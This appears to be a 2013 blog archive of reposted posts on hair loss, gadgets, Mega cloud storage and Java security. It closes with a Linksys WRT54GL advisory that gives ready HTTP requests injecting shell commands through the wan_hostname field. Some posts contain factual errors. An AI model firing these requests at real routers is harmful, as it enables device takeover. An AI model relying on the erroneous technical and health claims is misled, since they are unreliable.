Jan 23, 2013

Vitamin D Deficiency Causing Hair Loss

Staring at the mirror if the person across with thinning hair is really you? It is a common practice to hunt for wrinkles, thinning hair, etc., first thing in the mirror every morning, and hair fall might just be one reason for your worry wrinkles. A majority of us suffer from hair fall. Losing some hair everyday is normal, but if you are losing more than average hair everyday that is visible, it is time to get into thought for the reasons and hair loss solutions.


There are many reasons for hair fall, right from unhealthy lifestyles to dietary deficiencies, besides others. Everybody has their own perceptions on hair loss. While some blame it on the genes, but the fact is that hair fall issues never get acquired only through genes, it has many possible reasons and causes. There is a lot of research and experiment on the exact cause for hair fall, but studies show that dietary and vitamin deficiencies are among the top contenders.

Findings show a high amount of vitamin D recipients in the hair follicles, but their exact function is not known and proved, yet it is evident that this vitamin helps in the growth and maturation of the hair follicle. Even though a definite conclusion cannot be drawn for hair loss due to vitamin D deficiency, it is observed that this deficiency is one of the contributing factors for hair loss.

About Vitamin D

The sunshine vitamin is a fat soluble vitamin that maintains calcium metabolism. It is also known as Calciferol, you can rather nickname it as the sunshine vitamin. Your body naturally produces this vitamin. This pro-hormone, fat soluble vitamin, helps in absorption of calcium and phosphorous. A little exposure to sunlight will produce vitamin D in your body. It is also found in certain foods. Almost 80 - 90% of this vitamin is produced due to sun exposure by synthesis in the skin. The two forms of vitamin D important for the human body are, vitamins D2 (ergocalciferol) and D3 (cholecalciferol).

Hair Loss and Vitamin D

A lot of vitamins keeps your body functions and appearance healthy and working. In the case of hair, it is more or less the same. A lot of vitamins contribute to strong and healthy looking hair, specially vitamins for hair loss. Scientists and researchers are underway to understand the role of Vitamin D in hair loss. Study is done on a type of mice that are genetically programmed to be hairless.

The study results showed that when vitamin D3 was given to these mice, they showed improvement in hair growth with stimulation in the hair follicles. There is much more to do however in this research. Finding how will it affect the human genes, and would it really curb hair fall in people with low Vitamin D, needs more research. The right amount is required for good hair growth.

People who have been taking supplements with vitamin D have experienced a gradual decrease in the hair fall. Vitamin D helps in the development and growth of healthy hair and maturity of hair follicles. Certain fatty acids in this vitamin help in eliminating dandruff, scalp psoriasis, and also hair loss by regulating the flow of oils that nourish the collagen (a tissue that holds your hair beneath the skin). It helps in absorption of calcium, which is also important for hair growth.

Other Deficiencies and Causes for Hair Fall

As we discussed earlier, losing certain amount of hair is normal and is not a serious issue of hair fall. Human beings generally lose 50 - 70 strands of hair everyday. How will you check what amount of hair you lose? Simple, just take a 'pull test'. That is take about 60 - 80 strands of hair in your fingers, now gently but firmly pull the hair. Usually 5 - 10 strands will come out. Anything more than about 12 - 15 hair is not normal, and you may be suffering from hair loss.

Some of the common factors for reasons are, genetics, hormonal imbalance, stress (both emotional and physical), thyroid disorders, sudden weight loss due to crash or liquid protein diet, chemotherapy, harsh hair treatments, disease and disorders of the skin, certain medicines and surgery, vitamin deficiencies like vitamin A, vitamin D, dietary deficiencies like that of proteins, iron, copper, L-lysine, and zinc.

Sources of Vitamin D

The question that does vitamin D deficiency cause hair loss is well answered by all these facts. Now you know what to look out for when dealing with hair fall. A healthy diet and lifestyle, and adequate amount of vitamin D is essential. This vitamin can be found in cow's milk and soy milk, sardines, pink salmon, tuna fish, egg, liver, beef, cheese, ready-to-eat cereals fortified with DV for vitamin D, and pure cod liver oil. The most important is sunlight, so bask in the sunlight for 5-10 minutes (preferably between 9 - 11 in the morning) to get your dose of vitamin D. It is recommended to first take medical advice before taking supplements or medications for hair loss.

Why Does Your Hair Fall Out in the Shower?

Normal Hair Loss

When you shower and wash your hair, you massage the scalp. This action shakes loose the hair that's about to fall according to the normal hair cycle. Washing your hair will not cause you to lose any more hair that you would normally. The hair falls out in the shower because you shake loose the dead hair that has completed the healthy hair cycle.


Hair Cycle -- Anagen Phase

The anagen phase of the hair cycle is the growth phase. This is when the new hair has pushed out the dead hair and is actively growing out of the follicle. This phase typically lasts several years.

Hair Cycle -- Catagen Phase

The second phase of the hair cycle is the catagen phase. This is also known as the resting phase, when hair follicles stop producing hair. This is the phase prior to shedding, and lasts about two to four weeks.

Hair Cycle -- Telogen Phase

This is the last phase in the hair cycle. During this phase, shedding occurs. Like cats and dogs, people also shed. Dead hair falls out of hair follicles so it can be replaced by healthy new hair. This occurs all the time, not only in the shower. One way to tell whether the hair you shed in the shower is normal is to examine the hairs; they should all be about the same length and texture.

Hair Falling Out During Shower


Our hair is our crowning glory, and when this crowning glory starts losing its shine and begins to shed, it is a real cause for worry. Obviously, there are a lot of factors that affect hair fall and hair loss, and sometimes, it is when taking a shower that we notice the maximum hair fall. It seems like every time you touch your hair, you find clumps of it falling out. What do you do in such a case? Why is this happening? There are a lot of reasons for this, which we have discussed here.

Why Does Your Hair Fall Out in the Shower?

When your scalp is stimulated by a massage, it is likely to start shedding the hair strands that are weak or dead. This may not mean you are suffering from some abnormal problem. However, if you think the hair loss is beyond normal (100 hair strands a day), then it may be one of the following reasons that are contributing to you excessive hair fall.

The Telogen Phase of Hair Fall

The hair goes through three stages of growth, anagen (the growth phase), catagen (the resting phase), and telogen (the shedding phase). It is in this phase that hair falls a lot and it seems like you are shedding. The texture of the hair is fine and not weak. It is normal for this to last for about three months, and you may find greater instances in the shower because your attention is focused on your hair at that time. In reality, this could occur anywhere.

Stress

Stress has some serious physical ramifications on the body, and one of them is hair fall. A change in the hormonal activity is triggered by high stress levels, and it is this that may cause hair fall. Of course, hair experts suggest that hair fall due to stress is a very rare instance, as the body or mind has to be under continuous stress for long periods of time, but sometimes we don't realize how stressed out we are, and then notice our hair falling out in clumps, which in turn causes much more stress. The best way to combat this is to practice some relaxation techniques so that our mind and body is soothed.

Dandruff

Dandruff is one of the prime reasons of hair fall. The collection of dandruff flakes on the scalp results in weakening of the hair root. When you wash your hair, it is likely that you will lose a lot of it due to this problem. Also, the use of heavily medicated shampoos to treat dandruff may add to the problem of hair fall. Even then, getting rid of the dandruff may help reduce the problem of hair loss. Try to use natural remedies that will help eliminate dandruff and strengthen the hair root too.

Diet Low in Iron

Those of you who have low iron levels or suffer from anemia are likely to suffer from this problem of hair fall. Again, it is more pronounced in the shower as you massage your scalp and find all the dead and weak hair falling out. Women are more prone to this problem due to menstruation where heavy bleeding may result in low iron levels. Further, a diet devoid of this nutrient can definitely cause a problem. You should visit a doctor if you think this may be the problem to get yourself tested and be prescribed appropriate medication.

Use of Chemically Loaded Hair Products

You watch an ad that promises glowing, thick, gorgeous hair, and you must have the product. However, these products do not suit all hair types, and may have a negative effect on you considering the fact that you are losing so much hair. For instance, herbal shampoos do not agree with some people's hair leading it to become weak and then fall. Start using mild shampoos and again, resort to natural remedies to treat your hair. These help the hair grow stronger and bring about a lasting change.

When the hair loss just seems to be getting worse, it is important that you visit a doctor and find out the exact problem. It may be a lack of a nutrient, or even a health problem such as thyroid that may be causing it. In such a case, you will require medication to treat the problem thoroughly. Be gentle with your hair, treat it nicely, and there will be absolutely no reason for it to misbehave with you.

GSky USB WiFi Booster with 16dB Yagi Antenna


GSky (model:GS-27USB-50) USB wireless adapter is a clone of Signal, Comfast, Kinamax, CD-R King or other similar packaging that has been repainted with different names. It is not identical with Alfa except one version is using Realtek chipset RTL8187, the other two versions are both Ralink chipset (RL8225 & 2571wF). EIGRP is 500mW, if you want to increase the power output change with higher Gain antenna either Omni, directional or Yagi like mine.



Sara Sampaio


Sara Pinto Sampaio (Birth, July 21 of 1991) is a model female Portuguese. He won a Golden Globe Portuguese in 2011 and 2012 as "Best Female Model" in your country. It is one of the most prestigious Portuguese models and has appeared on the cover of major magazines worldwide distribution.




It became famous after winning the Pantene Hair Contest 2007. Has photographed for Vogue and Glamour and for Elle and Biba French. In 2012 was also the cover of April's Vogue Portuguese and was chosen to be the image of the international campaign Calzedonia Summer 2012 Mar, whose photographs were taken by Raphael Mazzucco in Greece and Jamaica. In 2013 appears the first year's edition of the magazine GQ Portugal , where it is presented as the "eighth wonder of the world".

Exynos 5 Octa Upcoming Galaxy S4

Samsung's upcoming Galaxy S4 handset could be powered by the company's new Exynos 5 Octa system-on-chip processor, if new leaked details are correct.


The processor, which is also believed to power the soon-to-be-released Galaxy Note 3 phablet device, isn't an eight-core chip in the traditional sense: as well as four high-performance processing cores based on ARM's Cortex-A15 design, it apparently includes a further four Cortex-A7 cores processing cores that offer less power but require less energy to operate. When the smartphone is running a processor-intensive application, such as a 3D game, the high-performance cores activate; when the phone is being used for less intensive work, such as making a call or listening to music, the high-performance cores are deactivated and the low-power cores used instead. However, only one set of four cores can be active at once.

The design is part of a system ARM calls big.LITTLE, similar to the 'companion core' concept found in Nvidia's Tegra 3 and 4 processors, but Samsung is the first company to attempt to launch an eight-core device into smartphones and tablets.

According to details posted to the AnTuTu Benchmark site, the Samsung Galaxy S4 will feature the model number GT-I9500. No other details were made public by the benchmark results, but previous rumours claim that the handset may feature a new 4.99in display with a Full HD 1080p resolution, 2GB of RAM and a high-resolution 13-megapixel rear-facing camera. The handset is expected to launch with Android 4.2 Jelly Bean as its operating system, becoming one of the first non-Nexus devices to feature the latest build of Google's popular mobile platform.

Thus far, Samsung has not commented on the rumours surrounding its Galaxy S4 handset plans. - source

Tegra 4 GPU will outperform the iPad 4's A6X

While few people seem to care about processors speeds on the desktop, it's a hot topic when it comes to mobile processors, and Nvidia has just raised the stakes with its new Tegra 4 processor.


The Tegra 4 has at its heart 72 custom Nvidia GeForce GPU cores, giving it six-times the graphics processing power of the current Tegra 3. Backing up the GPU is a new quad-core variant of ARM's Cortex-A15 CPU, a chip that Nvidia claims "delivers 2.6x faster Web browsing and breakthrough performance for apps."

According to AnandTech, the Tegra 4 processor will have six-times the arithmetic logic units (ALUs) that are present in the Tegra 3. If it is assumed that the Tegra 4 GPU cores will operate at 520 MHz -- which is the fastest that the Tegra 3 could go -- this means that the GPU will be capable of 74.8 GFLOPS (billion FLoating-point Operations Per Second) compared to the 71.6 GFLOPS that the PowerVR SGX 554MP4 inside Apple's A6X.

At CES 2013 Nvidia made the assertion that the Tegra 4 will be faster than the A6X both in 3D games and in GLBenchmark, but didn't provide further details on the matter.

This week, GLBenchmark results claiming to show Tegra 4 performance were leaked to the Web, but it appears that these are either fake or relate to prototype versions of the Tegra 4 running at much lower clock speeds.

While this seems to give Nvidia an advantage over Apple, the glory could be short-lived. Imagination Technologies, makers of the PowerVR GPU inside many smartphones and tablets -- including the iPhone and iPad -- have announced that its sixth-generation graphics core can deliver "20x or more" the performance of current-generation hardware while at the same time being five times more efficient.

Things are really starting to heat up in the mobile sector. - source

Jan 22, 2013

Xperia Z Become The Best Camera Phone

Everybody’s getting completely addicted to the cameras on their smartphones, causing phone makes to enter a huge megapixel war. While the battle raged on all of 2012 between the iPhone 5 and Galaxy S3 in terms of camera power, 2013’s got a new gadget that promises to steal the show – the Xperia Z.


When we analyzed the camera power of the Xperia Z against that of the iPhone 5 and Galaxy S3, we surely were amazed at what this 5-inch monster can do! For starters, it does have a higher resolution of 13 MP while the other two phones have 8MP cameras on board. But, it’s not just the higher megapixel count that makes the Xperia Z’s camera stand out.

What sets it apart is Sony’s special Exmos RS sensor that gives it a much more advanced sensor, capable of reproducing high quality images. Another interesting feature in the Xperia Z’s camera is its video HDR mode, which lets you record videos too in High Dynamic Range mode – a first definitely for phone cameras.

The Xperia Z also has a Superior Auto mode, which users of Sony digital cameras would find familiar. Also included is the Sweep Panorama mode, which makes clicking panoramic images literally a breeze!

You can adjust many features of the camera, including the resolution, white balance, timer, ISO, flash, exposure and some others like HDR, smile shutter, and even focus mode. When you’ve got it in your hands, you can easily be forgiven for thinking of it as a digital camera and not just a phone camera.

We also love the album app in the Xperia Z, which organizes thumbnail previews of the images you’ve clicked very nicely. Organized by date, it lets you browse through your picture library so easily, finding images becomes so much faster on this device. You can also display the images on a globe, thanks to the geotag feature, which will then pin your images based on the locations they were clicked in. - source

50GBs Free Cloud Storage From Mega

Hungry for 5Gbs of your free Cloud Storage that have offered by Google drive, Microsoft skydrive, Dropbox, Mediafire and others? Not anymore, Mega has just recently lunch of free cloud storage offering a huge data cloud storage that is ten (10) times bigger than those previous above mention.


Who wouldn't want 50GBs of free Internet storage? Dropbox is all fine and well, but it starts with a mere 2GBs of free space. Kim Dotcom's newly launched Mega cloud storage service with its free 50GBs of storage sounds much better, but how well does it really work? Let me open by saying it's a long, long way from perfect.

To get your free 50GBs of storage, you first must register your account with a valid e-mail address. Once you've done this—and it may take a while since the system is heavily over-burdened—you'll get a link to use to login to Mega.

You can just any Web browser to access your new storage so long as its actively supporting JavaScript. Mega recommends Chrome, but I was also able to use it with Firefox. However, Internet Explorer 10, Windows 8's default browser, is known to freeze up after uploading appoximately 100MBs of files.

Even with Chrome, I found the site often locked up on me. In particular, Mega promises that, if you don't close your current browser session, you can restart interrupted uploads and downloads . It didn't work for me. I will say, however, that getting an estimated upload time of infinity was one of the more amusing error messages I've ever seen.

Once you make it into Mega you're presented with a typical file/folder style display. You can upload both single files or folders. You can also download files at the same time as you're uploading others. Unlike more sophisticated cloud storage services, such as Dropbox, Mega's storage won't integrate with your file system. You can only access your files via a Web browser.

That may change soon. Mega is opening its application programming interface (API). The functionality already appears to be there to integrate Mega with your PC's existing file system.

For now, you can either drag and drop files into Mega from your file manager or use the site's upload buttons. If you're using Chrome, you can also try to drag and drop directories. Regardless of how you do it, be ready for long waits. In these early days, Mega is anything but fast.

Once loaded, you can right-click on file to get a link for it or download, rename; move, copy, delete, or reload it. You will also be able to drag and drop your files into new Mega folders.

Mega does indeed appear to give you 50GBs of free storage. Your files, however, may not be the files that are actually stored on the cloud.

To quote from Mega's terms of service, "Our service may automatically delete a piece of data you upload or give someone else access to where it determines that that data is an exact duplicate of original data already on our service. In that case, you will access that original data." So, for example, if you 'saved' a copy of Star Wars to Mega and someone else had uploaded the exact same video only his copy would be saved and when you accessed "your" copy, you'd really watching "his" copy.

There's nothing new about this of course. Apple uses the method with iTunes Match as does Amazon with its Cloud Player service. What we don't know, however, is how Mega does it because Mega also only stores encrypted files and the company states that it doesn't have access to your encryption key.

To be exact, when you get a Mega account, you choose a password. This password also serves as your symmetric encryption key. By symmetric Mega means you use the same Advanced Encryption Standard (AES) 128-bit key that's been derived from your password to both encrypt and decrypt your files and folders. This coding and decoding is all done on your computer.

Indeed Mega, doesn't keep your password/encryption key at all. If you lose your password, or it's hacked, Mega can't help you. Your files will be, for all practical purposes, toast. Even if you know for a fact that you'll never forget your password, "password," you may find that you can't log in anyway. While it didn't happen to me I've heard reports of users finding they couldn't log back in even though they knew they were using the right, simple password.

So, how can Mega know that your files are an exact duplicate of another user's? We don't know. There are many theories, such as these discussed on Ycombinator, but, for now, we're all just speculating.

Personally, I take Mega's warning about the safety of your data seriously: "You must maintain copies of all data stored by you on our service. We do not make any guarantees that there will be no loss of data or the services will be bug free."

That aside, if you want to share your files privately with someone, Mega uses far stronger encryption: 2,048-bit AES asymmetric encryption. This means there's both a public and private key pair. With this you should be able to securely share files with friends.

You can also use this method to share files directories with other users who also have Mega accounts. If you choose to share files or directories this way, you also control how much access your colleagues have to your shared data.

Of course, you shoud be able to share files with URLS that have your password embedded in them. With these, anyone who has the link can download the file.

I say "should" because once you start trying to use Mega you'll quickly find that the system is totally swamped. Dotcom is well aware of the problem. He tweeted, "The massive global PR around the #Megalaunch is simply to big to handle for our start-up. I apologize for poor service quality." He then added, "We are working 24/7 and expect normal operations within 48 hours. Lesson learned... No fancy launch event for Megabox ;-)"

So, exactly how overwhelmed are they? "If I would tell you how many signups we had since the launch you wouldn't believe it. I can't believe it. So, I won't tell you." Maybe Dotcom can't but what I can tell you is that, at best, I was seeing upload speeds of less than 1-Kilobit per second from my 5-Megabit per second Charter cable Internet connection. A lot of other basic functionality, such as simply being able to obtain the URL of an uploaded file, frequently failed for me.

The long and short of it is that Mega may prove to be a useful, free service... someday. For now, it's very much a work in progress. If you want good, free, and reliable cloud storage today, go to Dropbox, Google Drive, or Microsoft SkyDrive. If you have to have 50GBs of free storage, check out MediaFire's offering. But as for Mega, you'll be better off holding off for at least a week before trying it. You'll be glad you waited. - source

Samsung Galaxy S3 Vs Apple iPhone5 Vs LG Optimus G

The iPhone 5 has failed to make as big a mark as its predecessors, and there’s possibly worse news in store for Apple. 2013 has seen a host of brand new smartphones being launched, even though the year has barely begun. The LG Optimus G, LG’s latest flagship phone, is one such device that could also steal away some of the iPhone 5’s spotlight. So we decided to pit the Optimus G against the iPhone 5 and the current favorite flagship, the Samsung Galaxy S3, to see if it stood a chance in the market.


From the outside: The iPhone 5’s design might get a tad boring, considering it’s been the same since iPhone 4. At first glance, you might not even notice anything different – with its familiar brushed aluminum casing. But, we have to agree, it does give the iPhone a classy and expensive look. We love the Galaxy S3’s rounded pebble-like exterior – it gives it a different look. On the other hand, the Optimus G manages to make its mark even though it doesn’t look as classy as the iPhone – we especially love its Crystal Reflection rear panel.

The iPhone 5 has a 4-inch Retina LCD display with a resolution of 1136X640 pixels. We’ve obviously found the screen size far too small, especially in the age of 5-inch phablets. The Optimus G has a larger 4.7-inch display with a resolution of 768X1280 pixels. The Galaxy S3 has the largest 4.8-inch display among these three, but it has the least resolution of just 306 ppi, which negates the beauty of the large screen. LG seems to have struck a good balance between screen size and resolution on the Optimus G.

On the inside: The iPhone 5 is powered by a 1.3 GHz dual-core Apple A6 processor and 1 GB of RAM. The Galaxy S3 has a slightly more powerful 1.4 GHz processor but only 1 GB of RAM. The Optimus G’s got more power, with its 1.5 GHz quad-core Snapdragon S4 processor and 2 GB of RAM. Both the Galaxy S3 and Optimus G have 32 GB of internal storage as well as a microSD card slot for those who need more storage space – a big disappointment in the iPhone 5.

The OS: We can’t say anything bad about the iOS 6 that’s running the iPhone 5, which has the largest number of apps to choose from. Samsung’s Galaxy S3 runs on Android 4.1 Jelly Bean, which is a massive improvement over the previous ICS version. A major disappointment with the Optimus G is that it runs on Android 4.0. We wonder why LG couldn’t put in the Jelly Bean version instead.

Camera: In terms of front-facing cameras, there isn’t much difference between the iPhone 5 and the Optimus G – the iPhone 5 has a 1.2 MP camera while the Optimus G has a 1.3 MP camera. But the Galaxy S3 has a 1.9 MP front-facing camera, the best among these three. When it comes to the main camera, we love the Optimus G’s13 MP camera over the iPhone 5’s and the Galaxy S3’s 8 MP offering.

Battery: The iPhone 5 has a 1440 mAh camera which gives it a talktime of about 8 hours. The Optimus G and the Galaxy S3 are the winners in this category with their 2100 mAh battery and 15 hours of talktime.

Connectivity: All these phones offering LTE as well as 3G connectivity. The Optimus G and the Galaxy S3, in addition to WiFi and Bluetooth, also have NFC capabilities – an important feature missing in the iPhone 5. - source

Apple ‘cuts order for iPhone5 parts’ on 2013

Apple has slashed orders for the screens used on its iPhone5 because of weak sales while arch-rival Samsung has sold its 100 millionth Galaxy S device, in a sign of changing fortunes in the mobile market.


The iPhone maker has almost halved its order of liquid-crystal display panels from key suppliers, according to the Japanese newspaper the Nikkei.

Apple has told three suppliers, Japan Display, Sharp and LG Display, that it requires fewer screens, after previously requesting as many as 65 million units for the January to March quarter. Japan Display’s plant in Nomi, a key iPhone supplier, is expected to reduce output temporarily by between 70% and 80%, compared with the October to December period.

The iPhone5 is longer and lighter than previous models, but consumers have been underwhelmed and there have been glitches, notably the flawed maps function.

Apple has dominated the smartphone market with iPhone since its launch in 2007, but Samsung has caught up in recent years, following the launch of the Galaxy S series in May 2010. Last year, the latest model, the Galaxy S III, helped the South Korean firm to leapfrog its US rival to become the world’s top-selling smartphone manufacturer.

Sales of Samsung’s Galaxy S series have reached 100 million in under three years — faster than Apple’s iPhone, which took nearly four years.

Apple’s share price has tumbled by a quarter since September when iPhone5 debuted. In contrast, Samsung’s shares powered to a new record last week.

Both companies are benefiting from the mobile boom as consumers prefer smartphones and tablets to the traditional desktop or personal computer. Research firm Gartner reported today that global sales of PCs slumped 5% in the last three months, to 90.3 million. Gartner said the launch of “compelling low-cost tablets” — such as the Google Nexus and Amazon Kindle Fire — was helping to drive the shift from PC to tablet. - source

Jan 21, 2013

How to Disabled Java from the Browser

Below are instructions for disabling Java from whatever Web browser you may use to surf the Web. These instructions were originally posted as a how-to in response to this piece: Zero-Day Java Exploit Debuts in Crimeware.


Update, Jan 10, 10:35 a.m. ET: The latest version of Java 7 (Update 10) includes a feature that makes it simpler to unplug Java from the browser. Oracle has posted instructions on how to use this feature on Windows here. Also, KrebsOnSecurity just published a comprehensive Q&A that seeks to answer some of the most frequently asked questions about the scope of this vulnerability, and steps that users can take to protect themselves.

Original post:

For Windows users:

Mozilla Firefox: From the main menu select Add-ons, and then disable any plugins with the word “Java” in them. Restart the browser.

Google Chrome: Click the wrench icon in the upper right corner of the browser window, then select Settings. In the search results box to the right in the next screen, type “Java”. A box labeled “Content settings” should be highlighted. Click that, and then scroll down to the Plug-ins section. Click the “Disable individual plug-ins” link, find Java in the list, and click the disable link next to it.

Internet Explorer:

Apparently, getting Java unplugged from Internet Explorer is not straightforward. The U.S. Computer Emergency Response Team (USCERT) lists the following steps, which may or may not completely remove Java from IE:

In the Windows Control panel, open the Java item. Select the “Java” tab and click the “View” button. Uncheck “enabled” for any JRE version listed. Note that this method may not work on Vista or newer systems. As an alternative, you may use one of the following techniques:

Click the start key and type “regedit” in the search box. Double-click the regedit program file when it appears.

- Change the HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\\UseJava2IExplorer registry value to 0, where is any version of Java on your system. 10.6.2, for example.

If you are running a 32-bit version of Java on a 64-bit platform, you should set the HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\\UseJava2IExplorer registry value to 0.

- Run javacpl.exe as administrator, click the “Advanced” tab, select “Microsoft Internet Explorer” in the “Default Java for browsers” section, and press the space bar to uncheck it. This will properly set the above registry value, despite the option being greyed out.

US-CERT has some additional suggestions for removing Java from IE if the above steps do not do the trick. See their advisory for more details.

For Mac users:

Safari: Click Preferences, and then the Security tab (uncheck “Enable Java”).

Google Chrome: Open Preferences, and then type “Java” in the search box. Scroll down to the Plug-ins section, and click the link that says “Disable individual plug-ins.” If you have Java installed, you should see a “disable” link underneath its listing.

Firefox: Click Tools, Add-ons, and disable the Java plugin(s). - source

50% of all website exploited due to Java's vulnerable

Oracle Corp. said Monday it has released a fix for the flaw in its Java software that raised an alarm from the U.S. Department of Homeland Security last week. Even after the patch was issued, the federal agency continued to recommend that users disable Java in their Web browsers.


"This and previous Java vulnerabilities have been widely targeted by attackers, and new Java vulnerabilities are likely to be discovered," DHS said Monday in an updated alert published on the website of its Computer Emergency Readiness Team. "To defend against this and future Java vulnerabilities, consider disabling Java in Web browsers until adequate updates are available."

The alert follows on the department's warning late Thursday. Java allows programs to run within websites and powers some advertising networks. Users who disable Java may not be able to see portions of websites that display real-time data such as stock prices, graphical menus, weather updates and ads.

Vulnerability in the latest version, Java 7, was "being actively exploited," the department said.

Java 7 was released in 2011. Oracle said installing its "Update 11" will fix the problem.

Security experts said that special code to take advantage of the weakness is being sold on the black market through so-called "Web exploit packs" to Internet abusers who can use it to steal credit card data, personal information or cause other harm.

The packs, sold for upwards of $1,500 apiece, make complex hacker codes available to relative amateurs. This particular flaw even enables hackers to compromise legitimate websites by taking over ad networks. The result: users are redirected to malicious sites where damaging software can be loaded onto their computers.

The sale of the packs means malware exploiting the security gap is "going to be spread across the Internet very quickly," said Liam O'Murchu, a researcher with Symantec Corp. "If you have the opportunity to turn it off, you should."

Oracle said it released two patches — to address the flaw highlighted by the government, as well as another flaw that the government said was "different but equally severe."

As well, the patches set Java's default security level to "high" so that users will automatically be shown a prompt and given a chance to decline malicious software before it loads onto their computers.

Disabling Java completely in browsers has a similar effect, however. When websites appear without crucial functions, users can click a button to turn Java back on.

Making users aware when Java programs are about to be installed gives users a 50/50 chance of avoiding malware, said Kurt Baumgartner, a senior security researcher with Kaspersky Lab.

Many programmers are avoiding Java altogether, and its use in Web browsers is on the decline, he said.

Kaspersky Lab estimated that last year 50 percent of all website exploitations were due to vulnerabilities in Java. Adobe's Acrobat Reader accounted for another 28 percent of vulnerabilities. - source

New Java exploit sells for $5000 at black web

For Oracle, it's deja vu all over again.

Just days after it released a patch for a serious security flaw discovered last week in its Java programming language, the software is making headlines again because another previously unpublicized flaw in the program threatens the security of millions of PCs that may still have the application running on it.


Oracle released a fix Sunday for a Java flaw so serious that the U.S. Department of Homeland Security recommended that computer users disable the software unless using it was "absolutely necessary."

That advice was repeated Monday by the department's Computer Emergency Readiness Team (US-CERT) even after the patch was made available to users.

Vulnerablity for sale

Now it's being reported that an enterprising Black Hat is peddling a new Zero Day vulnerability for the latest version of Java (version 7, update 11) to up to two buyers for $5000 each.


Both weaponized and source code versions of the vulnerability were being offered by the seller, according to security blogger Brian Krebs, who discovered the offer on an exclusive cybercrime forum.

Since Krebs discovered the offer, he said, it has been removed from the crime forum, suggesting the seller found his buyers for the exploit.

"To my mind, this should dispel any illusions that people may harbor about the safety and security of having Java installed on an end-user PC without taking careful steps to isolate the program," Krebs wrote.

This latest Java exploit is worse than the last one because no one knows what it is, according to Bogdan Botezatu, senior e-threat analyst with anti-virus software maker Bitdefender.

In the flaw patched Sunday, he explained, the exploit code was identified by security researchers in some popular malware kits. With the latest flaw, it's only known to the seller.

"The current method of exploitation will likely remain unknown for a bigger timeframe, which will also increase the attackers' windows of opportunity," Botezatu said in an email.

Earlier this week, Botezatu noted in a blog that despite the patch pushed by Oracle on Sunday, cyber criminals continued to exploit the vulnerability on unpatched machines to install ransomware on them.

Oracle's security moves

In addition to addressing the Zero Day vulnerability in Sunday's patch, Oracle also boosted Java's security setting to "high" by default. "That means that right now the user has to authorize the execution of Java applets that are not signed with a valid certificate," explained Jaimie Blasco, manager of AlienVault Labs, in an email.

While that move is a great step toward making Java more secure on a browser, Blasco noted, it is far from a panacea for Java's problems.

"In the past, we have seen that the attackers were able to steal a valid certificate to sign malicious code so it won't surprise me if we see this technique being used," he said.

Because Java appears to be riddled with vulnerabilities, Bitdefender's Botezatu recommends Oracle identify the core components of the software and rewrite it from scratch.

No doubt, more than a little rewriting of the software will be done when Oracle releases the next version of Java scheduled for September. - source

Linksys WRT54GL 1.1 XSS OS Injection


Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
